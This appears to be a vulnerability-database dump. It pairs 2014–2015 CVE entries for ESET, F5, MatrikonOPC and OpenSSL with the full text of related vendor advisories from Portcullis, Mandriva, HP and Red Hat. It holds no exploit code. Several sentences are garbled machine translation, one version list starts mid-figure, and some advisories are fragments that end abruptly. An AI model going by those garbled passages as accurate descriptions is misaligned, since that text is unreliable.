The ESET Personal Firewall NDIS filter (EpFwNdis.sys) kernel mode driver, aka Personal Firewall module before Build 1212 (20140609), as used in multiple ESET products 5.0 through 7.0, allows local users to obtain sensitive information from kernel memory via crafted IOCTL calls. Multiple ESET Products are prone to a local information-disclosure vulnerability.
Local attackers can exploit this issue to obtain sensitive information. Information obtained may lead to further attacks. Both ESET Smart Security and ESET Endpoint Security are security package solutions from ESET in Slovakia, which include functions such as virus defense and cleaning, anti-spam and firewall; the former is the home version, and the latter is the business version.
The vulnerability is caused by improper validation for some IOCTLs.
Further details at:
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-4974/
Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
###############################################################
This email originates from the systems of Portcullis
Computer Security Limited, a Private limited company,
registered in England in accordance with the Companies
Act under number 02763799. The registered office
address of Portcullis Computer Security Limited is:
Portcullis House, 2 Century Court, Tolpits Lane, Watford,
United Kingdom, WD18 9RS.
The information in this email is confidential and may be
legally privileged. It is intended solely for the addressee.
Any opinions expressed are those of the individual and
do not represent the opinion of the organisation. Access
to this email by persons other than the intended recipient
is strictly prohibited.
If you are not the intended recipient, any disclosure,
copying, distribution or other action taken or omitted to be
taken in reliance on it, is prohibited and may be unlawful.
When addressed to our clients any opinions or advice
contained in this email is subject to the terms and
conditions expressed in the applicable Portcullis Computer
Security Limited terms of business.
###############################################################
#####################################################################################
This e-mail message has been scanned for Viruses and Content and cleared
by MailMarshal.
#####################################################################################
| VAR-201411-0350 | CVE-2014-6032 | plural F5 Vulnerability to read arbitrary files in the product |
CVSS V2: 5.5 CVSS V3: - Severity: MEDIUM |
Multiple XML External Entity (XXE) vulnerabilities in the Configuration utility in F5 BIG-IP LTM, ASM, GTM, and Link Controller 11.0 through 11.6.0 and 10.0.0 through 10.2.4, AAM 11.4.0 through 11.6.0, ARM 11.3.0 through 11.6.0, Analytics 11.0.0 through 11.6.0, APM and Edge Gateway 11.0.0 through 11.6.0 and 10.1.0 through 10.2.4, PEM 11.3.0 through 11.6.0, PSM 11.0.0 through 11.4.1 and 10.0.0 through 10.2.4, and WOM 11.0.0 through 11.3.0 and 10.0.0 through 10.2.4 and Enterprise Manager 3.0.0 through 3.1.1 and 2.1.0 through 2.3.0 allow remote authenticated users to read arbitrary files and cause a denial of service via a crafted request, as demonstrated using (1) viewList or (2) deal elements. plural F5 Product Configuration The utility has multiple locations XML Due to incomplete processing related to entity injection, arbitrary files can be read and service operation can be interrupted (DoS) There are vulnerabilities that are put into a state. Supplementary information : CWE Vulnerability type by CWE-611: Improper Restriction of XML External Entity Reference ('XXE') (XML Inappropriate restrictions on external entity references ) Has been identified. http://cwe.mitre.org/data/definitions/611.htmlRemotely authenticated users can read arbitrary files and interfere with service operation (DoS) There is a possibility of being put into a state.
Attackers can exploit this issue to obtain potentially sensitive information and to carry out other attacks. F5 BIG-IP LTM, etc. are all products of F5 Company in the United States. LTM is a local traffic manager; APM is a solution that provides secure unified access to business-critical applications and networks. A security vulnerability exists in the Configuration utility of several F5 products. 0, PSM 11.0.0 to 11.4.1 and 10.0.0 to 10.2.4, WOM 11.0.0 to 11.3.0 and 10.0.0 to 10.2.4, Enterprise Manager 3.0.0 Version to version 3.1.1 and version 2.1.0 to version 2.3.0
| VAR-201411-0414 | CVE-2014-5426 | MatrikonOPC DNP3 OPC Server Denial of service vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
MatrikonOPC OPC Server for DNP3 1.2.3 and earlier allows remote attackers to cause a denial of service (unhandled exception and DNP3 process crash) via a crafted message. Supplementary information : CWE Vulnerability types by CWE-17: Code ( code ) Has been identified. MatrikonOPC DNP3 OPC Server is a remote SCADA communication OPC server product from MatrikonOPC of Canada. This product can be connected to multiple DNP3 compatible devices. MatrikonOPC Server for DNP3 is prone to a remote denial-of-service vulnerability because it fails to handle exceptional conditions
| VAR-201501-0435 | CVE-2014-3571 | OpenSSL Service disruption in (DoS) Vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted DTLS message that is processed with a different read operation for the handshake header than for the handshake body, related to the dtls1_get_record function in d1_pkt.c and the ssl3_read_n function in s3_pkt.c. Supplementary information : CWE Vulnerability type by CWE-476: NULL Pointer Dereference (NULL Pointer dereference ) Has been identified.
An attacker may exploit this issue to crash the application, resulting in denial-of-service conditions. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
_______________________________________________________________________
Mandriva Linux Security Advisory MDVSA-2015:062
http://www.mandriva.com/en/support/security/
_______________________________________________________________________
Package : openssl
Date : March 27, 2015
Affected: Business Server 2.0
_______________________________________________________________________
Problem Description:
Multiple vulnerabilities has been discovered and corrected in openssl:
Race condition in the ssl3_read_bytes function in s3_pkt.c in OpenSSL
through 1.0.1g, when SSL_MODE_RELEASE_BUFFERS is enabled, allows
remote attackers to inject data across sessions or cause a denial of
service (use-after-free and parsing error) via an SSL connection in
a multithreaded environment (CVE-2010-5298).
The Montgomery ladder implementation in OpenSSL through 1.0.0l does
not ensure that certain swap operations have a constant-time behavior,
which makes it easier for local users to obtain ECDSA nonces via a
FLUSH+RELOAD cache side-channel attack (CVE-2014-0076).
The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before
1.0.1g do not properly handle Heartbeat Extension packets, which allows
remote attackers to obtain sensitive information from process memory
via crafted packets that trigger a buffer over-read, as demonstrated
by reading private keys, related to d1_both.c and t1_lib.c, aka the
Heartbleed bug (CVE-2014-0160).
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before
1.0.1h does not properly restrict processing of ChangeCipherSpec
messages, which allows man-in-the-middle attackers to trigger use of a
zero-length master key in certain OpenSSL-to-OpenSSL communications,
and consequently hijack sessions or obtain sensitive information,
via a crafted TLS handshake, aka the CCS Injection vulnerability
(CVE-2014-0224).
The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
products, uses nondeterministic CBC padding, which makes it easier
for man-in-the-middle attackers to obtain cleartext data via a
padding-oracle attack, aka the POODLE issue (CVE-2014-3566). NOTE: this issue
became relevant after the CVE-2014-3568 fix (CVE-2014-3569).
The BN_sqr implementation in OpenSSL before 0.9.8zd, 1.0.0 before
1.0.0p, and 1.0.1 before 1.0.1k does not properly calculate the square
of a BIGNUM value, which might make it easier for remote attackers to
defeat cryptographic protection mechanisms via unspecified vectors,
related to crypto/bn/asm/mips.pl, crypto/bn/asm/x86_64-gcc.c, and
crypto/bn/bn_asm.c (CVE-2014-3570).
The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before
0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote
SSL servers to conduct ECDHE-to-ECDH downgrade attacks and trigger
a loss of forward secrecy by omitting the ServerKeyExchange message
(CVE-2014-3572).
OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k
does not enforce certain constraints on certificate data, which allows
remote attackers to defeat a fingerprint-based certificate-blacklist
protection mechanism by including crafted data within a
certificate's unsigned portion, related to crypto/asn1/a_verify.c,
crypto/dsa/dsa_asn1.c, crypto/ecdsa/ecs_vrf.c, and crypto/x509/x_all.c
(CVE-2014-8275).
The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before
0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL
servers to conduct RSA-to-EXPORT_RSA downgrade attacks and facilitate
brute-force decryption by offering a weak ephemeral RSA key in a
noncompliant role, related to the FREAK issue. NOTE: the scope of
this CVE is only client code based on OpenSSL, not EXPORT_RSA issues
associated with servers or other TLS implementations (CVE-2015-0204).
The ssl3_get_cert_verify function in s3_srvr.c in OpenSSL 1.0.0 before
1.0.0p and 1.0.1 before 1.0.1k accepts client authentication with a
Diffie-Hellman (DH) certificate without requiring a CertificateVerify
message, which allows remote attackers to obtain access without
knowledge of a private key via crafted TLS Handshake Protocol traffic
to a server that recognizes a Certification Authority with DH support
(CVE-2015-0205).
The updated packages have been upgraded to the 1.0.1m version where
these security flaws has been fixed.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5298
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0076
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0195
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0198
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0221
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3470
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3513
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3569
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3570
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3571
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3572
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8275
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0204
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0205
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0206
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0209
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0286
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0287
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0288
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0289
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0293
http://openssl.org/news/secadv_20150108.txt
http://openssl.org/news/secadv_20150319.txt
_______________________________________________________________________
Updated Packages:
Mandriva Business Server 2/X86_64:
324a85f7e1165ab02881e44dbddaf599 mbs2/x86_64/lib64openssl1.0.0-1.0.1m-1.mbs2.x86_64.rpm
9c0bfb6ebd43cb6d81872abf71b4f85f mbs2/x86_64/lib64openssl-devel-1.0.1m-1.mbs2.x86_64.rpm
58df54e72ca7270210c7d8dd23df402b mbs2/x86_64/lib64openssl-engines1.0.0-1.0.1m-1.mbs2.x86_64.rpm
b5313ffb5baaa65aea05eb05486d309a mbs2/x86_64/lib64openssl-static-devel-1.0.1m-1.mbs2.x86_64.rpm
a9890ce4c33630cb9e00f3b2910dd784 mbs2/x86_64/openssl-1.0.1m-1.mbs2.x86_64.rpm
521297a5fe26e2de0c1222d8d03382d1 mbs2/SRPMS/openssl-1.0.1m-1.mbs2.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
iD8DBQFVFTm1mqjQ0CJFipgRAoYFAKCaubn00colzVNnUBFjSElyDptGMQCfaGoS
kz0ex6eI6hA6qSwklA2NoXY=
=GYjX
-----END PGP SIGNATURE-----
.
Softpaq:
http://ftp.hp.com/pub/softpaq/sp70501-71000/sp70649.exe
Easy Update Via ThinPro / EasyUpdate (x86):
http://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/security-sp-2.0-all-
4.1-4.3-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/security-sp-2.0-all-
4.1-4.3-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/security-sp-2.0-all-
4.1-4.3-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.1-all-
4.4-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/5.0/service_packs/security-sp-2.1-all-
5.0-5.1-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/5.1/service_packs/security-sp-2.1-all-
5.0-5.1-x86.xar
Via ThinPro / EasyUpdate (ARM):
http://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/security-sp-2.0-all-
4.1-4.3-armel.xar
http://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/security-sp-2.0-all-
4.1-4.3-armel.xar
http://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/security-sp-2.0-all-
4.1-4.3-armel.xar
http://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.0-all-
4.4-armel.xar
Note: Known issue on security-sp-2.0-all-4.1-4.3-arm.xar: With the patch
applied, VMware cannot connect if security level is set to "Refuse insecure
connections". Updating VMware to the latest package on ftp.hp.com will solve
the problem.
References:
CVE-2014-8275 Cryptographic Issues (CWE-310)
CVE-2014-3569 Remote Denial of Service (DoS)
CVE-2014-3570 Cryptographic Issues (CWE-310)
CVE-2014-3571 Remote Denial of Service (DoS)
CVE-2014-3572 Cryptographic Issues (CWE-310)
CVE-2015-0204 Cryptographic Issues (CWE-310)
SSRT101934
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP SSL for OpenVMS: All versions prior to 1.4-502.
HP SSL 1.4-502 for OpenVMS (based on OpenSSL 0.9.8ze) is available from the
following locations:
- HP SSL for OpenVMS website:
http://h71000.www7.hp.com/openvms/products/ssl/ssl.html
- HP Support Center website:
https://h20566.www2.hp.com/portal/site/hpsc/patch/home
Note: Login using your HP Passport account. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c04774019
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04774019
Version: 1
HPSBMU03409 rev.1 - HP Matrix Operating Environment, Multiple Vulnerabilities
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
Release Date: 2015-08-24
Last Updated: 2015-08-24
Potential Security Impact: Remote unauthorized modification, unauthorized
access, or unauthorized disclosure of information.
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP Matrix
Operating Environment. The vulnerabilities could be exploited remotely
resulting in unauthorized modification, unauthorized access, or unauthorized
disclosure of information.
References:
CVE-2010-5107
CVE-2013-0248
CVE-2014-0118
CVE-2014-0226
CVE-2014-0231
CVE-2014-1692
CVE-2014-3523
CVE-2014-3569
CVE-2014-3570
CVE-2014-3571
CVE-2014-3572
CVE-2014-8142
CVE-2014-8275
CVE-2014-9427
CVE-2014-9652
CVE-2014-9653
CVE-2014-9705
CVE-2015-0204
CVE-2015-0205
CVE-2015-0206
CVE-2015-0207
CVE-2015-0208
CVE-2015-0209
CVE-2015-0231
CVE-2015-0232
CVE-2015-0273
CVE-2015-0285
CVE-2015-0286
CVE-2015-0287
CVE-2015-0288
CVE-2015-0289
CVE-2015-0290
CVE-2015-0291
CVE-2015-0292
CVE-2015-0293
CVE-2015-1787
CVE-2015-1788
CVE-2015-1789
CVE-2015-1790
CVE-2015-1791
CVE-2015-1792
CVE-2015-2134
CVE-2015-2139
CVE-2015-2140
CVE-2015-2301
CVE-2015-2331
CVE-2015-2348
CVE-2015-2787
CVE-2015-3113
CVE-2015-5122
CVE-2015-5123
CVE-2015-5402
CVE-2015-5403
CVE-2015-5404
CVE-2015-5405
CVE-2015-5427
CVE-2015-5428
CVE-2015-5429
CVE-2015-5430
CVE-2015-5431
CVE-2015-5432
CVE-2015-5433
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Matrix Operating Environment impacted software components and versions:
HP Systems Insight Manager (SIM) prior to version 7.5.0
HP System Management Homepage (SMH) prior to version 7.5.0
HP Version Control Agent (VCA) prior to version 7.5.0
HP Version Control Repository Manager (VCRM) prior to version 7.5.0
HP Insight Orchestration prior to version 7.5.0
HP Virtual Connect Enterprise Manager (VCEM) prior to version 7.5.0
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2010-5107 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2013-0248 (AV:L/AC:M/Au:N/C:N/I:P/A:P) 3.3
CVE-2014-0118 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3
CVE-2014-0226 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8
CVE-2014-0231 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2014-1692 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2014-3523 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2014-3569 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2014-3570 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2014-3571 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2014-3572 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2014-8142 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2014-8275 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2014-9427 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2014-9652 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2014-9653 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2014-9705 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-0204 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3
CVE-2015-0205 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2015-0206 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-0207 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-0208 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3
CVE-2015-0209 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8
CVE-2015-0231 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-0232 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8
CVE-2015-0273 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-0285 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3
CVE-2015-0286 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-0287 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-0288 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-0289 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-0290 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-0291 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-0292 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-0293 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-1787 (AV:N/AC:H/Au:N/C:N/I:N/A:P) 2.6
CVE-2015-1788 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3
CVE-2015-1789 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3
CVE-2015-1790 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-1791 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8
CVE-2015-1792 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-2134 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.0
CVE-2015-2139 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5
CVE-2015-2140 (AV:N/AC:M/Au:S/C:P/I:P/A:N) 4.9
CVE-2015-2301 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-2331 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-2348 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2015-2787 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-3113 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2015-5122 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2015-5123 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2015-5402 (AV:L/AC:M/Au:N/C:C/I:C/A:C) 6.9
CVE-2015-5403 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5
CVE-2015-5404 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
CVE-2015-5405 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.0
CVE-2015-5427 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
CVE-2015-5428 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
CVE-2015-5429 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
CVE-2015-5430 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2015-5431 (AV:N/AC:M/Au:S/C:P/I:P/A:N) 4.9
CVE-2015-5432 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
CVE-2015-5433 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has made the following software updates available to resolve the
vulnerabilities in the impacted versions of HP Matrix Operating Environment
HP Matrix Operating Environment 7.5.0 is only available on DVD. Please order
the latest version of the HP Matrix Operating Environment 7.5.0 DVD #2 ISO
from the following location:
http://www.hp.com/go/insightupdates
Choose the orange Select button. This presents the HP Insight Management
Media order page. Choose Insight Management 7.5 DVD-2-ZIP August 2015 from
the Software specification list. Fill out the rest of the form and submit it.
HP has addressed these vulnerabilities for the affected software components
bundled with the HP Matrix Operating Environment in the following HP Security
Bulletins.
HP Matrix Operating Environment component
HP Security Bulletin Number
Security Bulletin Location
HP Systems Insight Manager (SIM)
HPSBMU03394
HPSBMU03394
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04762744
HP System Management Homepage (SMH)
HPSBMU03380
http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04746490&la
ng=en-us&cc=
HP Version Control Agent (VCA)
HPSBMU03397
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04765169
HP Version Control Repository Manager (VCRM)
HPSBMU03396
https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr
_na-c04765115
HP Virtual Connect Enterprise Manager (VCEM) SDK
HPSBMU03413
https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr
_na-c04774021
HISTORY
Version:1 (rev.1) - 24 August 2015 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2015 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: openssl security update
Advisory ID: RHSA-2015:0066-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-0066.html
Issue date: 2015-01-20
Updated on: 2015-01-21
CVE Names: CVE-2014-3570 CVE-2014-3571 CVE-2014-3572
CVE-2014-8275 CVE-2015-0204 CVE-2015-0205
CVE-2015-0206
=====================================================================
1. Summary:
Updated openssl packages that fix multiple security issues are now
available for Red Hat Enterprise Linux 6 and 7.
Red Hat Product Security has rated this update as having Moderate security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64
Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux HPC Node (v. 6) - x86_64
Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
3. Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL),
Transport Layer Security (TLS), and Datagram Transport Layer Security
(DTLS) protocols, as well as a full-strength, general purpose cryptography
library. A remote attacker could send a specially crafted DTLS message,
which would cause an OpenSSL server to crash. (CVE-2014-3571)
A memory leak flaw was found in the way the dtls1_buffer_record() function
of OpenSSL parsed certain DTLS messages. A remote attacker could send
multiple specially crafted DTLS messages to exhaust all available memory of
a DTLS server. (CVE-2015-0206)
It was found that OpenSSL's BigNumber Squaring implementation could produce
incorrect results under certain special conditions. This flaw could
possibly affect certain OpenSSL library functionality, such as RSA
blinding. Note that this issue occurred rarely and with a low probability,
and there is currently no known way of exploiting it. (CVE-2014-3570)
It was discovered that OpenSSL would perform an ECDH key exchange with a
non-ephemeral key even when the ephemeral ECDH cipher suite was selected.
A malicious server could make a TLS/SSL client using OpenSSL use a weaker
key exchange method than the one requested by the user. (CVE-2014-3572)
It was discovered that OpenSSL would accept ephemeral RSA keys when using
non-export RSA cipher suites. A malicious server could make a TLS/SSL
client using OpenSSL use a weaker key exchange method. (CVE-2015-0204)
Multiple flaws were found in the way OpenSSL parsed X.509 certificates.
An attacker could use these flaws to modify an X.509 certificate to produce
a certificate with a different fingerprint without invalidating its
signature, and possibly bypass fingerprint-based blacklisting in
applications. (CVE-2014-8275)
It was found that an OpenSSL server would, under certain conditions, accept
Diffie-Hellman client certificates without the use of a private key.
An attacker could use a user's client certificate to authenticate as that
user, without needing the private key. (CVE-2015-0205)
All OpenSSL users are advised to upgrade to these updated packages, which
contain a backported patch to mitigate the above issues. For the update to
take effect, all services linked to the OpenSSL library (such as httpd and
other SSL-enabled services) must be restarted or the system rebooted.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the
Red Hat Network to apply this update are available at
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1180184 - CVE-2015-0204 openssl: Only allow ephemeral RSA keys in export ciphersuites
1180185 - CVE-2014-3572 openssl: ECDH downgrade bug fix
1180187 - CVE-2014-8275 openssl: Fix various certificate fingerprint issues
1180234 - CVE-2014-3571 openssl: DTLS segmentation fault in dtls1_get_record
1180235 - CVE-2015-0206 openssl: DTLS memory leak in dtls1_buffer_record
1180239 - CVE-2015-0205 openssl: DH client certificates accepted without verification
1180240 - CVE-2014-3570 openssl: Bignum squaring may produce incorrect results
6. Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source:
